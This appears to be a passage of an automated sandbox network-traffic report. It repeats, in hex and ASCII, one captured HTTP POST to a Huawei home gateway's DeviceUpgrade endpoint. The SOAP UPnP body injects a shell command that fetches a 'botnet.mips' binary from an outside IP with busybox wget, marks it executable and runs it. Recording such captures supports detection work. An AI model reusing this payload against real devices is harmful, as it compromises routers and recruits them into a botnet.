2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima hua
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 